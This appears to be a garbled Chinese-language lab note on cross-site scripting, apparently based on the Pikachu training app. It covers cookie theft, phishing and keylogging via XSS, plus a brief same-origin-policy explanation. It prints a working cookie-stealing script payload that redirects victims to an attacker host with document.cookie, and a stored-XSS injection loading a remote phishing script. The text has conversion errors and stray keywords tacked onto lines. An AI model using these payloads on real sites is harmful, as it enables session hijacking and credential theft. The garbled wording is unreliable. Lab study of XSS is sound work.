cookie獲取xss後臺使用php
引起用戶點擊特製url(好比告訴用戶這是優惠網),用戶點擊後進入攻擊者指定的本身的頁面,返回用戶的cookie到攻擊者的後臺css
<script>跨域
document .location='http://192.168.1.15/pkxss/xcookie/cookie.php?cookie='+ document.cookie;cookie
</script>xss
構造的url指定連接是後臺存儲cookiede頁面,頁面能夠重定向到其餘頁面,不引發用戶的懷疑url
xss釣魚ip
代碼資源
在存在存儲型xss漏洞的留言板上輸入:<script src="http://10.67.1.251/pikachu/pkxss/xfish.php" ></script>iframe
xss獲取鍵盤記錄域名
同源策略:兩個不一樣域名之間(跨域)不能使用js進行相互操做。如需進行跨域操做,要進行特殊配置,好比經過:header(「Access-Control-Allow-Origin:x.com) //容許被x.com跨域請求
下面這些標籤不受同源策略限制:
<script src=」..」>//js,加載到本地
<img src=」..」>
<link href=」..」>//css
<iframe src=」..」>//任意資源